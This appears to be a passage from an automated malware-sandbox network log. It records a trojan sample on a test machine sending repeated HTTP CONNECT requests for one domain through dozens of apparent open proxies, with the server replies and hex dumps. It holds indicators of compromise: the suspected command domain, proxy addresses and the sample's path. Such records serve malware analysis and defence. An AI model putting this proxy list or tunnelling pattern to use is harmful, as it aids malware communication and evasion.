                                                                                Feb 23, 2024 14:28:37.105942965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.195075989 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.195677042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1447192.168.2.853871114.67.113.118451305828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.107094049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.497613907 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1448192.168.2.853963102.67.101.24280805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.131153107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1449192.168.2.854253104.24.236.203805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.131155014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.218873024 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:37 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1450192.168.2.854251159.65.77.16885855828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.161164045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1451192.168.2.85424993.117.72.27557705828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.163547993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1452192.168.2.853967103.141.109.14381815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.224044085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.673870087 CET19INHTTP/1.1 200 OK
                                                                                Feb 23, 2024 14:28:39.744009972 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1453192.168.2.854261190.14.224.24436295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.225759029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1454192.168.2.85424643.251.213.62835828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.255815983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.644773006 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1455192.168.2.85425545.179.231.21056785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.256503105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1456192.168.2.853985103.76.148.9281815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.265187979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.398175955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.958811045 CET19INHTTP/1.1 200 OK
                                                                                Feb 23, 2024 14:28:45.959825993 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1457192.168.2.854273104.18.237.128805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.269310951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.357481956 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:37 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1458192.168.2.854252203.99.116.10056785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.293118000 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1459192.168.2.85425861.178.152.3173025828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.293848991 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Feb 23, 2024 14:28:37.626826048 CET90INHTTP/1.1 200 OK
                                                                                Content-Type: application/json
                                                                                Connection: close
                                                                                Content-Length: 55


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1460192.168.2.85427591.92.155.20731285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.301018953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.479278088 CET28INHTTP/1.1 400 Bad Request


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1461192.168.2.8531365.252.23.20610805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.309453964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.398176908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1462192.168.2.8531455.104.174.199235005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.320677042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.251527071 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1463192.168.2.8541415.58.97.8980805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.330426931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.382510900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.789546967 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1464192.168.2.854284184.185.2.1241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.341626883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1465192.168.2.854124105.214.71.10356785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.365134954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1466192.168.2.854194217.112.80.252805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.381356955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.516599894 CET882INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:28:38 GMT
                                                                                Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                Content-Length: 665
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 70 6f 73 74 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6d 20 50 48 50 2f 37 2e 34 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at postmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27 Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1467192.168.2.85416698.162.25.7316535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.385164022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1468192.168.2.85322050.63.13.3120355828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.396243095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.491656065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.492163897 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1469192.168.2.85429824.152.50.1169995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.405728102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1470192.168.2.854306104.19.5.247805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.405792952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.493139029 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:37 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1471192.168.2.853189103.165.64.8641535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.407717943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1472192.168.2.854151117.102.115.15441535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.424297094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.491769075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1473192.168.2.854297104.238.228.20131285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.436897039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.050088882 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1474192.168.2.854214186.215.87.19488965828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.436897039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.491899014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.492178917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1475192.168.2.854232125.227.225.15733895828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.475831985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1476192.168.2.854307156.200.116.7419815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.476238966 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.185653925 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.879681110 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.251590014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.898355007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.586131096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:48.397969007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:53.741439104 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:04.257208109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1477192.168.2.854309128.199.252.2280005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.495062113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.827419996 CET19INHTTP/1.0 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1478192.168.2.854316172.67.38.96805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.497104883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.586781979 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:37 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
